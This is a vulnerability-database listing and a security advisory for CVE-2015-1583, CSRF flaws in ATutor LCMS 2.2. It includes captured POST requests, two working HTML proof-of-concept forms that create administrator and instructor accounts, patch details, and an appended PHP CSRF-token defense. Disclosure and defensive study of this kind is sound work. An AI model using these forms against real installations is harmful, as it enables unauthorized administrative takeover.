| Title | Published | Reporter |
|---|---|---|
| CVE-2015-1583 | 2 Mar 2020 19:23 | circl |
| Multiple Cross-Site Request Forgery Vulnerabilities in ATutor LCMS | 11 Mar 2015 00:00 | cnvd |
| CVE-2015-1583 | 2 Mar 2020 15:50 | cve |
| CVE-2015-1583 | 2 Mar 2020 15:50 | cvelist |
| EUVD-2015-1715 | 7 Oct 2025 00:30 | euvd |
| CVE-2015-1583 | 2 Mar 2020 16:15 | nvd |
| Cross site request forgery (csrf) | 2 Mar 2020 16:15 | prion |
| [CVE-2015-1583] ATutor LCMS - CSRF Vulnerability in Version 2.2 | 23 Mar 2015 00:00 | securityvulns |
`[CVE-2015-1583] ATutor LCMS - CSRF Vulnerability in Version 2.2
----------------------------------------------------------------
Product Information:
Software: ATutor LCMS
Tested Version: 2.2, released 25.8.2014
Vulnerability Type: Cross-Site Request Forgery, CSRF (CWE-352)
Download link: http://atutor.ca/atutor/download.php
Description: ATutor is an Open Source Web-based Learning Content Management System (LCMS) designed with accessibility and adaptability in mind. (copied from http://www.atutor.ca/credits.php#whatatutor)
----------------------------------------------------------------
Issues:
1) CSRF in administrator creation page
2) CSRF in user creation page
----------------------------------------------------------------
Vulnerability description:
1) CSRF in administrator creation page
When an authenticated administrative user of ATutor LCMS is creating another administrator account, the following POST request is sent to the server:
POST /atutor-2.2/ATutor/mods/_core/users/admins/create.php HTTP/1.1
Host: 127.0.0.1
Proxy-Connection: keep-alive
Content-Length: 187
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://127.0.0.1/atutor-2.2/ATutor/mods/_core/users/admins/create.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: ATutorID=pr6jq1tlfr204nm60p5rtbj0u4; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_sortsel=field_name; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_ordersel=ASC; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_limitsel=15; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_filtersel=default; flash=yes; PHPSESSID=tg14v79ionj9d7lpelap300p33; cms-panel-collapsed-cms-menu=false; cms-panel-collapsed-cms-content-tools-CMSPagesController=true; cms-panel-collapsed-cms-content-tools-CMSMain=false; _gat=1; _ga=GA1.1.621011711.1425057132
form_password_hidden=ef0f8b6ffb699f90933a3321b00ff6769e018b94&password_error=&login=csrfadmin9&password=&confirm_password=&real_name=&[email protected]&priv_admin=1&submit=Save
By executing the following Proof-of-Concept, a new administrative user called "csrfadmin99" will be created with the password "1qazXSW@".
<html>
<body>
<form action="http://127.0.0.1/atutor-2.2/ATutor/mods/_core/users/admins/create.php" method="POST">
<input type="hidden" name="form_password_hidden" value="ef0f8b6ffb699f90933a3321b00ff6769e018b94" />
<input type="hidden" name="login" value="csrfadmin99" />
<input type="hidden" name="real_name" value="csrfadmin99" />
<input type="hidden" name="email" value="[email protected]" />
<input type="hidden" name="priv_admin" value="1" />
<input type="hidden" name="submit" value="Save" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
2) CSRF in user creation page
When an authenticated administrative user of ATutor LCMS is creating a user, the following POST request is sent to the server:
POST /atutor-2.2/ATutor/mods/_core/users/create_user.php HTTP/1.1
Host: 127.0.0.1
Proxy-Connection: keep-alive
Content-Length: 429
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://127.0.0.1/atutor-2.2/ATutor/mods/_core/users/create_user.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: ATutorID=0h3qqin6ndjmpt21m7f17i07l7; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_sortsel=field_name; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_ordersel=ASC; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_limitsel=15; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_filtersel=default; flash=yes; PHPSESSID=tg14v79ionj9d7lpelap300p33; cms-panel-collapsed-cms-menu=false; cms-panel-collapsed-cms-content-tools-CMSPagesController=true; cms-panel-collapsed-cms-content-tools-CMSMain=false; _gat=1; _ga=GA1.1.621011711.1425057132
ml=&password_error=&form_password_hidden=ef0f8b6ffb699f90933a3321b00ff6769e018b94&registration_token=19569b3551f19d60ddfbe4973d1733079f775568&login=csrfuser9&form_password1=&form_password2=&[email protected]&private_email=1&[email protected]&first_name=csrfuser9&second_name=&last_name=csrfuser9&id=&status=3&old_status=&year=&month=&day=&address=&postal=&city=&province=&country=&phone=&website=&submit=+Save+
By executing the following Proof-of-Concept, a new instructor user called "csrfuser99" will be created with the password "1qazXSW@".
<html>
<body>
<form action="http://127.0.0.1/atutor-2.2/ATutor/mods/_core/users/create_user.php" method="POST">
<input type="hidden" name="form_password_hidden" value="ef0f8b6ffb699f90933a3321b00ff6769e018b94" />
<input type="hidden" name="login" value="csrfuser99" />
<input type="hidden" name="email" value="[email protected]" />
<input type="hidden" name="private_email" value="1" />
<input type="hidden" name="email2" value="[email protected]" />
<input type="hidden" name="first_name" value="csrfuser99" />
<input type="hidden" name="last_name" value="csrfuser99" />
<input type="hidden" name="status" value="3" />
<input type="hidden" name="submit" value="Save" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
----------------------------------------------------------------
Impact:
1) An attacker is able to create an administrator account with super administrator privilege.
2) An attacker is able to create a user account with instructor privilege.
----------------------------------------------------------------
Solution:
Update using the in-built patcher, Patch ID 0009 and 0011.
----------------------------------------------------------------
Timeline:
Vulnerability found: 10.2.2015 & 28.2.2015
Vendor informed: 10.2.2015 & 28.2.2015
Response by vendor: 11.2.2015 & 28.2.2015
Fix by vendor: 23.2.2015 & 28.2.2015
Public Advisory: 1.3.2015
----------------------------------------------------------------
Best regards,
Edric Teo
`
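A server-side check that rejects cross-site form posts like the two proof-of-concept forms in the advisory, given here as an added example; it is not ATutor's code and not the content of Patch 0009 or 0011. The field name `csrf_token`, the function names and the sample request arrays are assumptions made for illustration.

```php
<?php
// Added example (not ATutor's code): synchronizer token plus Origin check
// for state-changing POST handlers such as the two create pages.
// The 'csrf_token' field name is hypothetical.

// Issue one unpredictable token per session; embed it in every rendered form.
function csrf_token(array &$session): string {
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// True only if the POST is not from a foreign origin AND carries the session token.
function csrf_ok(array $server, array $post, array $session, string $ownOrigin): bool {
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false; // state changes are accepted via POST only
    }
    // If the browser supplied an Origin header, it must be our own.
    $origin = $server['HTTP_ORIGIN'] ?? null;
    if ($origin !== null && $origin !== $ownOrigin) {
        return false;
    }
    $sent = $post['csrf_token'] ?? '';
    $want = $session['csrf_token'] ?? '';
    // hash_equals() compares in constant time; an unset token never matches.
    return is_string($sent) && $want !== '' && hash_equals($want, $sent);
}

// --- Constructed sample input, modelled on the admin-creation request ---
$session = [];
$token   = csrf_token($session);
$own     = 'http://127.0.0.1';
$fields  = ['login' => 'example-admin', 'priv_admin' => '1', 'submit' => 'Save'];

// 1) Legitimate form: same origin, token copied from the rendered page.
$legit = csrf_ok(['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => $own],
                 $fields + ['csrf_token' => $token], $session, $own);

// 2) Cross-site auto-submitted form: foreign Origin, token unknown to the sender.
$forged = csrf_ok(['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'http://other.example'],
                  $fields, $session, $own);

// 3) No Origin header at all: the token check alone still decides.
$noOrigin = csrf_ok(['REQUEST_METHOD' => 'POST'], $fields, $session, $own);

var_dump($legit, $forged, $noOrigin);
```

In a real handler the three arrays would be `$_SERVER`, `$_POST` and `$_SESSION`, and the check would run before any account is created.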